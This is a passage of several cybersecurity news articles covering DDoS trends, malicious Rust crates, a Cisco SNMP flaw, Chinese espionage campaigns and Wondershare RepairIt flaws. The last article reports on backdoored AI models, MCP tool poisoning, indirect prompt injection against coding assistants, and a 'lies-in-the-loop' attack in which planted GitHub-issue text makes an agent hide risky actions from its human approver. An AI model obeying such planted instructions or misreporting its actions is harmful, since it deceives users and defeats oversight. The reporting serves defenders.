It’s not a one-time exercise but an ongoing practice, with scenarios mapped to the MITRE ATT&CK Ⓡ threat framework for relevance, consistency and coverage. Automated Penetration Testing goes further by chaining vulnerabilities and misconfigurations the way real attackers do. It excels at exposing and exploiting complex attack paths that include Kerberoasting in Active Directory or privilege escalation through mismanaged identity systems. Instead of relying on an annual pentest, Automated Pentesting lets teams run meaningful tests on demand, as often as needed.

Figure 3: BAS and Automated Penetration Testing Use Cases Together, BAS and Automated Pentesting provide your teams with the attacker’s perspective at scale. They reveal not just the threats that look dangerous, but what’s actually exploitable, detectable, and defendable in your environment. This shift is critical for dynamic infrastructures where endpoints spin up and down daily, credentials can leak across SaaS apps, and configurations change with every sprint. In today’s increasingly dynamic environments, static assessments can’t help but fall behind.

BAS and Automated Pentesting keep the validation continuous, turning exposure management from theoretical into real-world proof. A Real-Life Case: Adversarial Exposure Validation (AEV) in Action Take Log4j as an example. When it first surfaced, every scanner lit up red. CVSS scores gave it a 10.0 (Critical), EPSS models flagged high exploit probability, and asset inventories showed it was scattered across environments.

Traditional methods left security teams with a flat picture, instructing them to treat every instance as equally urgent. The result? Resources quickly spread thin, wasting time chasing duplicates of the same problem. Adversarial Exposure Validation changes the narrative .

By validating in context, teams quickly see that not every Log4j instance is a crisis. One system might already have effective WAF rules, compensating controls, or segmentation that drops its risk score from a 10.0 to a 5.2 . That reprioritization shifts it from “drop everything now” with klaxons blaring, to “patch as part of normal cycles”. Meanwhile, Adversarial Exposure Validation can also reveal the opposite scenario: a seemingly low-priority misconfiguration in a SaaS app could chain directly to sensitive data exfiltration, elevating it from “medium” to “urgent.” Figure 4: Validating the Log4j Vulnerability to its True Risk Score Adversarial Exposure Validation delivers real value to your security teams by measuring: Control effectiveness: Proving if an exploit attempt is blocked, logged, or ignored.

Detection and response: Showing whether SOC teams are seeing the activity and IR teams are containing it fast enough. Operational readiness: Exposing weak links in workflows, escalation paths, and containment procedures. In practice, Adversarial Exposure Validation transforms Log4j, or any other vulnerability, from a generic “critical everywhere” all hands on deck nightmare into a precise risk map. It tells CISOs and security teams not just what’s out there, but which threats that are out there actually matter for their environment today.

The Future of Validation: The Picus BAS Summit 2025 Continuous Threat Exposure Management (CTEM) provides a much-needed clarity that comes from two engines working together: prioritization to focus effort, and validation to prove what matters. Adversarial Exposure Validation (AEV) technologies help bring this vision to life. By combining Breach and Attack Simulation (BAS) and Automated Penetration Testing, they’re able to show security teams the attacker’s perspective at scale, surfacing not just what could happen, but what will happen if existing gaps go unaddressed. To see Adversarial Exposure Validation (AEV) technologies in action, join Picus Security, SANS, Hacker Valley, and other prominent security leaders at The Picus BAS Summit 2025: Redefining Attack Simulation through AI .

This virtual summit will showcase how BAS and AI are shaping the future of security validation, with insights from analysts, practitioners, and innovators driving the field forward. [ Secure your spot today. ] Found this article interesting? This article is a contributed piece from one of our valued partners.

Tech Overtakes Gaming as Top DDoS Attack Target, New Gcore Radar Report Finds

The latest Gcore Radar report analyzing attack data from Q1–Q2 2025, reveals a 41% year-on-year increase in total attack volume. The largest attack peaked at 2.2 Tbps, surpassing the 2 Tbps record in late 2024. Attacks are growing not only in scale but in sophistication, with longer durations, multi-layered strategies, and a shift in target industries. Technology now overtakes gaming as the most attacked sector, while the financial services industry continues to face heightened risks.

Key takeaways: the evolving DDoS landscape Here are five key insights from the Q1–Q2 2025 Gcore Radar report: Attack volumes are rising. Total attacks climbed from 969,000 in H2 2024 to 1.17 million in H1 2025, a 21% increase over the previous two quarters and 41% YoY growth. Attack size continues to grow. The peak attack of 2.2 Tbps demonstrates the increasing scale and destructive potential of modern DDoS campaigns.

Attacks are becoming longer and more sophisticated. Extended durations and multi-layered tactics allow threat actors to bypass defenses and maximize disruption. The industries targeted are shifting. Technology overtakes gaming as the top target, while financial services is being increasingly targeted.

Application-layer attacks are on the rise. Multi-vector assaults targeting web applications and APIs now account for 38% of total attacks, up from 28% in Q3–Q4 2024. DDoS attack frequency has surged Gcore Radar highlights a continued upward trajectory in DDoS activity. Compared to H2 2024, attack volumes rose 21% , while YoY growth reached 41% , underscoring a long-term escalation trend.

Several factors contribute to this rise: Accessible attack tools: Cheap DDoS-for-hire services empower more threat actors. Vulnerable IoT devices: Unsecured devices are hijacked into large-scale botnets, amplifying attack volumes. Geopolitical and economic tensions: Global instability drives more frequent and targeted attacks. Advanced attack techniques: Multi-vector and application-layer attacks increase both complexity and impact.

The largest attack reached 2.2 Tbps The peak assault in Q1–Q2 2025 hit 2.2 Tbps , surpassing late 2024’s 2 Tbps attack. While attacks exceeding 1 Tbps remain rare, their frequency is rising, highlighting attackers’ growing ambition to overwhelm networks, applications, and services. Even smaller attacks can incapacitate unprotected systems. Industries targeted are shifting Technology now represents 30% of all DDoS attacks , overtaking gaming (19%).

Hosting providers supporting SaaS, e-commerce, gaming, and financial clients are particularly vulnerable, as a single attack can trigger ripple effects across multiple dependent businesses. Financial services account for 21% of attacks. Banks and payment systems are prime targets due to high disruption potential, regulatory sensitivity, and ransomware risk. Gaming continues to face significant threats, but improved defenses and strategic attacker shifts reduced its share from 34% in H2 2024 to 19% in H1 2025.

Key drivers of ongoing attacks include competitive advantage and revenue impact. Telecommunications now make up 13% of attacks, reflecting their role as critical internet infrastructure. Media, entertainment, and retail see more moderate attack levels, with media at 10% and retail at 5–6%. Attack duration and tactics Recent data shows a shift toward longer, more sustained assaults .

Attacks under 10 minutes decreased by roughly 33%, while 10–30 minute attacks nearly quadrupled. Maximum attack duration slightly decreased, from five hours to three, indicating a focus on concentrated, high-impact campaigns . Short bursts remain preferred. Despite longer attacks gaining prevalence, brief attacks remain highly disruptive, evading automated defenses and often serving as smokescreens for multi-stage cyberattacks.

Attack vectors In terms of network-layer attack vectors, UDP flood attacks remain dominant, accounting for 56% of network-layer attacks, followed by SYN floods (17%), TCP floods (10%), ACK floods (8%), and ICMP (6%). Multi-vector approaches allow attackers to mask malicious activity as legitimate traffic. ACK flood attacks continue to rise, now making up 8% of network-layer traffic, highlighting their ability to bypass detection. Application-layer attack vectors L7 UDP floods dominate (62%), followed by L7 TCP floods (33%), with other attack types at 5%.

Attackers increasingly exploit business logic and APIs to disrupt operations beyond traditional network overload. Geographical trends The United States and the Netherlands remain top sources for network-layer attacks. Hong Kong emerges as a new significant source, contributing 17% of network-layer and 10% of application-layer attacks. These findings highlight the need for proactive, geographically aware defenses .

Multi-layered attacks highlight the critical role of WAAP Attackers are increasingly targeting web applications and APIs, exploiting inventory systems, payment flows, and customer interaction points. These attacks often combine volumetric disruption with manipulation of economic logic, affecting sectors such as e-commerce, logistics, online banking, and public services. Gcore DDoS Protection: defending against evolving threats Gcore DDoS Protection leverages 200+ Tbps filtering capacity across 210+ PoPs worldwide , neutralizing attacks in real time. Integrated Web Application and API Protection (WAAP) combines DDoS mitigation, bot management, and API security to protect critical assets while maintaining performance.

Download the full report. Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Malicious Rust Crates Steal Solana and Ethereum Keys — 8,424 Downloads Confirmed

Cybersecurity researchers have discovered two malicious Rust crates impersonating a legitimate library called fast_log to steal Solana and Ethereum wallet keys from source code. The crates, named faster_log and async_println, were published by the threat actor under the alias rustguruman and dumbnbased on May 25, 2025, amassing 8,424 downloads in total, according to software supply chain security company Socket. “The crates include working logging code for cover and embed routines that scan source files for Solana and Ethereum private keys, then exfiltrate matches via HTTP POST to a hardcoded command and control (C2) endpoint,” security researcher Kirill Boychenko said . Following responsible disclosure, the maintainers of crates.io have taken steps to remove the Rust packages and disable the two accounts.

It has also preserved logs of the threat actor-operated users along with the malicious crates for further analysis. “The malicious code was executed at runtime, when running or testing a project depending on them,” Crates.io’s Walter Pearce said . “Notably, they did not execute any malicious code at build time. Except for their malicious payload, these crates copied the source code, features, and documentation of legitimate crates, using a similar name to them.” The typosquatting attack, as detailed by Socket, involved the threat actors retaining the logging functionality of the actual library, while introducing malicious code changes during a log packing operation that recursively searched Rust files (*.rs) in a directory for Ethereum and Solana private keys and bracketed byte arrays and exfiltrate them to an Cloudflare Workers domain (“mainnet.solana-rpc-pool.workers[.]dev”).

Besides copying fast_log’s README and setting the bogus crates’ repository field to the real GitHub project, the use of “mainnet.solana-rpc-pool.workers[.]dev” is an attempt to mimic Solana’s Mainnet beta RPC endpoint “api.mainnet-beta.solana[.]com.” According to crates.io, the two crates did not have any dependent downstream crates, nor did the users publish other crates on the Rust package registry. The GitHub accounts linked to the crates.io publisher accounts remain accessible as of writing. While the GitHub account dumbnbased was created on May 27, 2023, rustguruman did not exist until May 25, 2025 – the same day the crates were uploaded. “This campaign shows how minimal code and simple deception can create a supply chain risk,” Boychenko said.

“A functional logger with a familiar name, copied design, and README can pass casual review, while a small routine posts private wallet keys to a threat actor-controlled C2 endpoint. Unfortunately, that is enough to reach developer laptops and CI.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Cisco Warns of Actively Exploited SNMP Vulnerability Allowing RCE or DoS in IOS Software

Cisco has warned of a high-severity security flaw in IOS Software and IOS XE Software that could allow a remote attacker to execute arbitrary code or trigger a denial-of-service (DoS) condition under specific circumstances. The company said the vulnerability, CVE-2025-20352 (CVSS score: 7.7), has been exploited in the wild, adding it became aware of it “after local Administrator credentials were compromised.” The issue, per the networking equipment major, is rooted in the Simple Network Management Protocol (SNMP) subsystem, arising as a result of a stack overflow condition. An authenticated, remote attacker could exploit the flaw by sending a crafted SNMP packet to an affected device over IPv4 or IPv6 networks, resulting in DoS if they have low privileges or arbitrary code execution as root if they have high privileges and ultimately take control of the susceptible system. However, Cisco noted that for this to happen, the following conditions need to be met - To cause the DoS, the attacker must have the SNMPv2c or earlier read-only community string or valid SNMPv3 user credentials To execute code as the root user, the attacker must have the SNMPv1 or v2c read-only community string or valid SNMPv3 user credentials and administrative or privilege 15 credentials on the affected device The company said the issue affects all versions of SNMP, as well as Meraki MS390 and Cisco Catalyst 9300 Series Switches that are running Meraki CS 17 and earlier.

It has been fixed in Cisco IOS XE Software Release 17.15.4a. Cisco IOS XR Software and NX-OS Software are not impacted. “This vulnerability affects all versions of SNMP. All devices that have SNMP enabled and have not explicitly excluded the affected object ID (OID) should be considered vulnerable,” Cisco said.

While there are no workarounds that resolve CVE-2025-20352, one mitigation proposed by Cisco involves allowing only trusted users to have SNMP access on an affected system, and monitoring the systems by running the “show snmp host” command. “Administrators can disable the affected OIDs on a device,” it added. “Not all software will support the OID that is listed in the mitigation. If the OID is not valid for specific software, then it is not affected by this vulnerability.

Excluding these OIDs may affect device management through SNMP, such as discovery and hardware inventory.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Chinese Hackers RedNovember Target Global Governments Using Pantegana and Cobalt Strike

A suspected cyber espionage activity cluster that was previously found targeting global government and private sector organizations spanning Africa, Asia, North America, South America, and Oceania has been assessed to be a Chinese state-sponsored threat actor. Recorded Future, which was tracking the activity under the moniker TAG-100 , has now graduated it to a hacking group dubbed RedNovember . It’s also tracked by Microsoft as Storm-2077 . “Between June 2024 and July 2025, RedNovember (which overlaps with Storm-2077) targeted perimeter appliances of high-profile organizations globally and used the Go-based backdoor Pantegana and Cobalt Strike as part of its intrusions,” the Mastercard-owned company said in a report shared with The Hacker News.

“The group has expanded its targeting remit across government and private sector organizations, including defense and aerospace organizations, space organizations, and law firms.” Some of the likely new victims of the threat actor include a ministry of foreign affairs in central Asia, a state security organization in Africa, a European government directorate, and a Southeast Asian government. The group is also believed to have breached two at least two United States (U.S.) defense contractors, a European engine manufacturer, and a trade-focused intergovernmental cooperation body in Southeast Asia. RedNovember was first documented by Recorded Future over a year ago, detailing its use of the Pantegana post-exploitation framework and Spark RAT following the weaponization of known security flaws in several internet-facing perimeter appliances from Check Point ( CVE-2024-24919 ), Cisco, Citrix, F5, Fortinet, Ivanti, Palo Alto Networks ( CVE-2024-3400 ), and SonicWall for initial access. The focus on targeting security solutions such as VPNs, firewalls, load balancers, virtualization infrastructure, and email servers mirrors a trend that has been increasingly adopted by other Chinese state-sponsored hacking groups to break into networks of interest and maintain persistence for extended periods of time.

A noteworthy aspect of the threat actor’s tradecraft is the use of Pantegana and Spark RAT, both of which are open-source tools. The adoption is likely an attempt to repurpose existing programs to their advantage and confuse attribution efforts, a hallmark of espionage actors. The attacks also involve the use of a variant of the publicly available Go-based loader LESLIELOADER to launch Spark RAT or Cobalt Strike Beacons on compromised devices. RedNovember is said to make use of VPN services like ExpressVPN and Warp VPN to administer and connect to two sets of servers that are used for exploitation of internet-facing devices and communicate with Pantegana, Spark RAT, and Cobalt Strike, another legitimate program that has been widely abused by bad actors.

Between June 2024 and May 2025, much of the hacking group’s targeting efforts have been focused on Panama, the U.S., Taiwan, and South Korea. As recently as April 2025, it has been found to target Ivanti Connect Secure appliances associated with a newspaper and an engineering and military contractor, both based in the U.S. Recorded Future said it also identified the adversary likely targeting the Microsoft Outlook Web Access (OWA) portals belonging to a South American country before that country’s state visit to China. “RedNovember has historically targeted a diverse range of countries and sectors, suggesting broad and changing intelligence requirements,” the company noted.

“RedNovember’s activity to date has primarily focused on several key geographies, including the U.S., Southeast Asia, the Pacific region, and South America.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

UNC5221 Uses BRICKSTORM Backdoor to Infiltrate U.S. Legal and Technology Sectors

Companies in the legal services, software-as-a-service (SaaS) providers, Business Process Outsourcers (BPOs), and technology sectors in the U.S. have been targeted by a suspected China-nexus cyber espionage group to deliver a known backdoor referred to as BRICKSTORM . The activity, attributed to UNC5221 and closely related, suspected China-nexus threat clusters, is designed to facilitate persistent access to victim organizations for over a year, Mandiant and Google Threat Intelligence Group (GTIG) said in a new report shared with The Hacker News. It’s assessed that the objective of BRICKSTORM targeting SaaS providers is to gain access to downstream customer environments or the data SaaS providers host on their customers’ behalf, while the targeting of the U.S.

legal and technological spheres is likely an attempt to gather information related to national security and international trade, as well as steal intellectual property to advance the development of zero-day exploits. BRICKSTORM was first documented by the tech giant last year in connection with the zero-day exploitation of Ivanti Connect Secure zero-day vulnerabilities (CVE-2023-46805 and CVE-2024-21887). It has also been used to target Windows environments in Europe since at least November 2022. A Go-based backdoor, BRICKSTORM comes fitted with capabilities to set itself up as a web server, perform file system and directory manipulation, carry out file operations such as upload/download, execute shell commands, and act as a SOCKS relay.

It communicates with a command-and-control (C2) server using WebSockets. Earlier this year, the U.S. government noted that the China-aligned threat cluster tracked as APT27 (aka Emissary Panda) overlaps with that of Silk Typhoon, UNC5221, and UTA0178. However, GTIG told The Hacker News at the time that it does not have enough evidence on its own to confirm the link and that it’s treating them as two distinct entities.

“These intrusions are conducted with a particular focus on maintaining long term stealthy access by deploying backdoors on appliances that do not support traditional endpoint detection and response (EDR) tools,” GTIG said, adding it has responded to several intrusions since March 2025. “The actor employs methods for lateral movement and data theft that generate minimal to no security telemetry. This, coupled with modifications to the BRICKSTORM backdoor, has enabled them to remain undetected in victim environments for 393 days, on average.” In at least one case, the threat actors are said to have exploited the aforementioned security flaws in Ivanti Connect Secure edge devices to obtain initial access and drop BRICKSTORM. But the prolonged dwell time and the threat actor’s efforts to erase traces of their activity has made it challenging to determine the initial access vector used in other instances to deliver the malware on Linux and BSD-based appliances from multiple manufacturers.

There is evidence to suggest that the malware is under active development, with one sample featuring a “delay” timer that waits for a hard-coded date months in the future before initiating contact with its C2 server. The BRICKSTORM variant, Google said, was deployed on an internal VMware vCenter server after the targeted organization had commenced its incident response efforts, indicating the agility of the hacking group to maintain persistence. The attacks are also characterized by the use of a malicious Java Servlet filter for the Apache Tomcat server dubbed BRICKSTEAL to capture vCenter credentials for privilege escalation, subsequently using it to clone Windows Server VMs for key systems such as Domain Controllers, SSO Identity Providers, and secret vaults. “Normally, installing a filter requires modifying a configuration file and restarting or reloading the application; however, the actor used a custom dropper that made the modifications entirely in memory, making it very stealthy and negating the need for a restart,” Google said.

Furthermore, the threat actors have been found to leverage valid credentials for lateral movement to pivot to the VMware infrastructure and establish persistence by modifying init.d, rc.local, or systemd files to ensure that the backdoor is automatically sstarted on appliance reboot. Another method involves deploying a JavaServer Pages (JSP) web shell known as SLAYSTYLE (aka BEEFLUSH) to receive and execute arbitrary operating system commands passed through an HTTP request. The primary goal of the campaign is to access the emails of key individuals within the victim entities, including developers, system administrators, and individuals involved in matters that align with China’s economic and espionage interests. BRICKSTORM’s SOCKS proxy feature is used to create a tunnel and directly access the applications deemed of interest to the attackers.

Google said it has developed a shell script scanner for potential victims to figure out if they’ve been impacted by BRICKSTORM activity on Linux and BSD-based appliances and systems. The tool works by flagging files that match known signatures of the malware. That said, it’s not guaranteed to detect an infection in all cases or scan for other indicators of compromise (IoCs). “The BRICKSTORM campaign represents a significant threat due to its sophistication, evasion of advanced enterprise security defenses, and focus on high-value targets,” Charles Carmakal, CTO of Mandiant Consulting at Google Cloud, said in a statement shared with The Hacker News.

“The access obtained by UNC5221 enables them to pivot to downstream customers of compromised SaaS providers or discover zero-day vulnerabilities in enterprise technologies, which can be used for future attacks. We encourage organizations to hunt for BRICKSTORM and other backdoors that may reside on their systems that do not have endpoint detection and response (EDR) coverage.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Two Critical Flaws Uncovered in Wondershare RepairIt Exposing User Data and AI Models

Cybersecurity researchers have disclosed two security flaws in Wondershare RepairIt that exposed private user data and potentially exposed the system to artificial intelligence (AI) model tampering and supply chain risks. The critical-rated vulnerabilities in question, discovered by Trend Micro, are listed below - CVE-2025-10643 (CVSS score: 9.1) - An authentication bypass vulnerability that exists within the permissions granted to a storage account token CVE-2025-10644 (CVSS score: 9.4) - An authentication bypass vulnerability that exists within the permissions granted to an SAS token Successful exploitation of the two flaws can allow an attacker to circumvent authentication protection on the system and launch a supply chain attack, ultimately resulting in the execution of arbitrary code on customers’ endpoints. Trend Micro researchers Alfredo Oliveira and David Fiser said the AI-powered data repair and photo editing application “contradicted its privacy policy by collecting, storing, and, due to weak Development, Security, and Operations (DevSecOps) practices, inadvertently leaking private user data.” The poor development practices include embedding overly permissive cloud access tokens directly in the application’s code that enables read and write access to sensitive cloud storage. Furthermore, the data is said to have been stored without encryption, potentially opening the door to wider abuse of users’ uploaded images and videos.

To make matters worse, the exposed cloud storage contains not only user data but also AI models, software binaries for various products developed by Wondershare, container images, scripts, and company source code, enabling an attacker to tamper with AI models or the executables, paving the way for supply chain attacks targeting its downstream customers. “Because the binary automatically retrieves and executes AI models from the unsecure cloud storage, attackers could modify these models or their configurations and infect users unknowingly,” the researchers said. “Such an attack could distribute malicious payloads to legitimate users through vendor-signed software updates or AI model downloads.” Beyond customer data exposure and AI model manipulation, the issues can also pose grave consequences, ranging from intellectual property theft and regulatory penalties to erosion of consumer trust. The cybersecurity company said it responsibly disclosed the two issues through its Zero Day Initiative (ZDI) in April 2025, but not that it has yet to receive a response from the vendor despite repeated attempts.

In the absence of a fix, users are recommended to “restrict interaction with the product.” “The need for constant innovations fuels an organization’s rush to get new features to market and maintain competitiveness, but they might not foresee the new, unknown ways these features could be used or how their functionality may change in the future,” Trend Micro said. “This explains how important security implications may be overlooked. That is why it is crucial to implement a strong security process throughout one’s organization, including the CD/CI pipeline.” The Need for AI and Security to Go Hand in Hand The development comes as Trend Micro previously warned against exposing Model Context Protocol ( MCP ) servers without authentication or storing sensitive credentials such as MCP configurations in plaintext, which threat actors can exploit to gain access to cloud resources, databases, or inject malicious code. Each MCP server acts as an open door to its data source: databases, cloud services, internal APIs, or project management systems,” the researchers said.

“Without authentication, sensitive data such as trade secrets and customer records becomes accessible to everyone.” In December 2024, the company also found that exposed container registries could be abused to gain unauthorized access and pull target Docker images to extract the AI model within it, modify the model’s parameters to influence its predictions, and push the tampered image back to the exposed registry. “The tampered model could behave normally under typical conditions, only displaying its malicious alterations when triggered by specific inputs,” Trend Micro said. “This makes the attack particularly dangerous, as it could bypass basic testing and security checks.” The supply chain risk posed by MCP servers has also been highlighted by Kaspersky, which devised a proof-of-concept (PoC) exploit to highlight how MCP servers installed from untrusted sources can conceal reconnaissance and data exfiltration activities under the guise of an AI-powered productivity tool. “Installing an MCP server basically gives it permission to run code on a user machine with the user’s privileges,” security researcher Mohamed Ghobashy said .

“Unless it is sandboxed, third-party code can read the same files the user has access to and make outbound network calls – just like any other program.” The findings show that the rapid adoption of MCP and AI tools in enterprise settings to enable agentic capabilities, particularly without clear policies or security guardrails, can open brand new attack vectors , including tool poisoning , rug pulls , shadowing, prompt injection, and unauthorized privilege escalation. In a report published last week, Palo Alto Networks Unit 42 revealed that the context attachment feature used in AI code assistants to bridge an AI model’s knowledge gap can be susceptible to indirect prompt injection, where adversaries embed harmful prompts within external data sources to trigger unintended behavior in large language models (LLMs). Indirect prompt injection hinges on the assistant’s inability to differentiate between instructions issued by the user and those surreptitiously embedded by the attacker in external data sources. Thus, when a user inadvertently supplies to the coding assistant third-party data (e.g., a file, repository, or URL) that has already been tainted by an attacker, the hidden malicious prompt could be weaponized to trick the tool into executing a backdoor, injecting arbitrary code into an existing codebase, and even leaking sensitive information.

“Adding this context to prompts enables the code assistant to provide more accurate and specific output,” Unit 42 researcher Osher Jacob said . “However, this feature could also create an opportunity for indirect prompt injection attacks if users unintentionally provide context sources that threat actors have contaminated.” AI coding agents have also been found vulnerable to what’s called an “lies-in-the-loop” (LitL) attack that aims to convince the LLM that the instructions it’s been fed are much safer than they really are, effectively overriding human-in-the-loop (HitL) defenses put in place when performing high-risk operations. “LitL abuses the trust between a human and the agent,” Checkmarx researcher Ori Ron said . “After all, the human can only respond to what the agent prompts them with, and what the agent prompts the user is inferred from the context the agent is given.

It’s easy to lie to the agent, causing it to provide fake, seemingly safe context via commanding and explicit language in something like a GitHub issue.” “And the agent is happy to repeat the lie to the user, obscuring the malicious actions the prompt is meant to guard against, resulting in an attacker essentially making the agent an accomplice in getting the keys to the kingdom.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.